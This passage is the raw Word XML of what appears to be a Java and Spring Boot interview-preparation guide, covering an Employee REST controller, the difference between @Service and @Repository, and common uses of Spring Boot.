    <w:p w14:paraId="0F37104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E7890FE" w14:textId="77777777" w:rsidR="000B4B82" w:rsidRPr="00D774B4" w:rsidRDefault="000B4B82" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="025F3D4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Salary(double salary) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ABDF6C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salary = salary;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B0F60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DC45B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46A392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Repository Interface:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> This interface extends JpaRepository to handle basic CRUD operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A20045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3953F9D1" w14:textId="77777777" w:rsidR="000B4B82" w:rsidRPr="00D774B4" w:rsidRDefault="000B4B82" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65A389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Long&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF1783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9CBC0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Service Layer (optional but recommended):</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> The service layer will handle the business logic and interact with the repository.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE541C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6C19AA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2FB046FA" w14:textId="77777777" w:rsidR="000B4B82" w:rsidRPr="00D774B4" w:rsidRDefault="000B4B82" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="189FAC6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0A4CA9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CFE173F" w14:textId="77777777" w:rsidR="000B4B82" w:rsidRPr="00D774B4" w:rsidRDefault="000B4B82" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0ACE8B6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0C7AFA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77A9CE49" w14:textId="77777777" w:rsidR="000B4B82" w:rsidRPr="00D774B4" w:rsidRDefault="000B4B82" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="485BD11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saveEmployee(Employee employee) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0570271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mployeeRepository.save(employee);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A991DE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F1D4B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66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Controller to Handle the POST Request:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> The controller will handle HTTP requests, including the POST request to add an Employee object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C1B2B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19F298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0AD289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ResponseEntity;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E363C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3378546A" w14:textId="77777777" w:rsidR="000B4B82" w:rsidRPr="00D774B4" w:rsidRDefault="000B4B82" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A4B2F0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15865E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employees")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57493B0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2F69A680" w14:textId="77777777" w:rsidR="000B4B82" w:rsidRPr="00D774B4" w:rsidRDefault="000B4B82" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="032550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97F840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BF83D43" w14:textId="77777777" w:rsidR="000B4B82" w:rsidRPr="00D774B4" w:rsidRDefault="000B4B82" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D52F97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3339716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ResponseEntity&lt;Employee&gt; addEmployee(@RequestBody Employee employee) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC012B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mployee savedEmployee = employeeService.saveEmployee(employee);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9C082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savedEmployee, HttpStatus.CREATED);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F2513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22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39491E"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AB6CD6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Marks the class as a REST controller, capable of handling HTTP requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F2C98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api/employees")</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Specifies the base URL for the employee-related operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2A031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Specifies that this method handles POST requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C5EC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Indicates that the Employee data will be provided in the body of the request (typically in JSON format).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BFEFA8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Entity&lt;Employee&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Returns the saved Employee along with the HTTP status code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDF0F60"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POST Request:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5D9E0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would send a POST request to http://localhost:8080/api/employees with the body:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71846FA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0BD005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6DC3B26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079FB8E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1584CCE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22B6B8F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6E23118"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sponse:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E82585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 will be a JSON representation of the saved Employee object, along with the 201 Created HTTP status code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298497D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C0F0F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2AE8E48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4393329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0108526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374EE05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011AA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employee is successfully saved in the database through the POST call.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36DCAE9F" w14:textId="5104A87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596" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F186AC4" w14:textId="6F18A3CF" w:rsidR="009D6DE9" w:rsidRPr="00CE4B95" w:rsidRDefault="00437F52">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="620" w:name="_Toc197867834"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the size of Spring in your project? Who will decide that</w:t>
      </w:r>
      <w:r w:rsidR="009D6DE9" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="620"/>
    </w:p>
    <w:p w14:paraId="0D696272" w14:textId="4AB2C8F5"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ject Requirements:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E52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pplication Type</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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 Set</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The more features you need, the more Spring modules you'll include, which increases the size. For example, if you need security features, you'll include spring-security, which adds more dependencies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469A4E2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Dependency Management:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B4107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the Spring framework will depend on the dependencies that are included in your pom.xml (for Maven) or build.gradle (for Gradle) file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE7B1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Cloud</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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Spring Boot and Dependency Injection (DI):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57BD0B2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Starters</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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You can choose only the starters that match your requirements, controlling the size of Spring in your project.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793C721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Application Scope:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF2A9A4"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icroservices</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If you're building microservices, you typically want a lightweight application, so you might use only necessary Spring modules (Spring Boot, Spring Data JPA, etc.). This keeps the size smaller.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E62A9A8"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nolithic Applications</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Larger, monolithic applications may require a broader range of Spring modules for features like security, messaging, and transaction management, which can increase the size.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A136AE6"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Spring Configuration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F8BD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66C17C5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w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>developer</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rchitect</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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597" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2059544D" w14:textId="29C52449" w:rsidR="009D6DE9" w:rsidRPr="00CE4B95" w:rsidRDefault="00B22966">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="621" w:name="_Toc197867835"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What will happen when we replace @Service instead of @Repository</w:t>
      </w:r>
      <w:r w:rsidR="009D6DE9" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="621"/>
    </w:p>
    <w:p w14:paraId="0ECFACB0" w14:textId="2EB2F5A4"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replace @Service with @Repository in a Spring application, the following changes and effects may occur:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5020899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emantic Meaning:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4A714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both annotations are used for defining Spring beans and making them eligible for dependency injection, the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>primary difference</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>intent</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> behind each annotation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31DB6B7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s for business/service logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B62F7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is for data access and DAO logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D46B48D"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practice</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, using @Repository instead of @Service won’t break the application, as both annotations result in a Spring bean being created, but it changes the intended meaning or role of the class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C896F65"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Exception Translation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F835E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has a built-in exception translation mechanism. It automatically translates any database-related exceptions (like SQLException) into Spring's DataAccessException (a runtime exception).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC80C78"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y this happens</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Spring's @Repository provides the mechanism to handle exceptions more specifically related to data access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E934D01"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ffect if you replace @Repository with @Service</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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 Scanning:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F167B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ervice and @Repository are specializations of @Component, which means that Spring will scan the class and create a bean for dependency injection regardless of which annotation is used.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C257F38"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urpose and Design:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758E852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signals to other developers that the class is responsible for interacting with a database, while @Service indicates that the class contains business logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7796DBB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48FE84AF"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unctional Impact</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Replacing @Service with @Repository will still allow the class to be managed by Spring, but it loses the exception translation mechanism that @Repository provides for database operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6734FA39"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sign Impact</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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us, it is always best to use @Service for service-layer components and @Repository for DAO/data access components for proper separation of concerns and clear intent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A662CC" w14:textId="3BB982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77A623D4">
          <v:rect id="_x0000_i2598" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B86DA4A" w14:textId="5D49EB4E" w:rsidR="009D6DE9" w:rsidRPr="00CE4B95" w:rsidRDefault="00F50C69">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="622" w:name="_Toc197867836"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain uses of SpringBoot application</w:t>
      </w:r>
      <w:r w:rsidR="009D6DE9" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="622"/>
    </w:p>
    <w:p w14:paraId="0D9A1687" w14:textId="2F94683F"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Microservices Development:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3498D0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Spring Boot is widely used in building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architecture, where each service is small, independent, and focused on a specific business functionality.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65969B1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simplifies the creation of stand-alone applications, providing embedded servers and easy configuration management.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC843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gration with Spring Cloud</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> makes it easier to handle service discovery, load balancing, and centralized configuration, all essential parts of a microservice ecosystem.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66CAD68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Web Applications:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E951F6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pring Boot is extensively used to build RESTful APIs with minimal setup. The built-in support for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makes it easy to create controllers, map endpoints, and handle HTTP requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E1D5B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 Applications</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Spring Boot can be used to build traditional web applications by integrating with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and other templating engines for rendering dynamic HTML pages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D14CB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 Applications</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It also supports WebSocket communication, which can be leveraged for building real-time web applications such as chat applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7377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atabase Access:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55685A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 and Hibernate</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Spring Boot simplifies the integration with </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JPA</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Java Persistence API) and </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Hibernate</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for interacting with relational databases like MySQL, PostgreSQL, Oracle, etc. It can automatically configure data sources, set up entity classes, and even perform database migrations with tools like </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Liquibas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Flyway</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F75FFB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SQL Databases</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Spring Boot also supports NoSQL databases like </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>MongoDB</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assandra</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Couchbase</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which makes it easier to set up and connect to these databases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CDF9E0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mmand-line Applications:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BDE26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 Apps</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
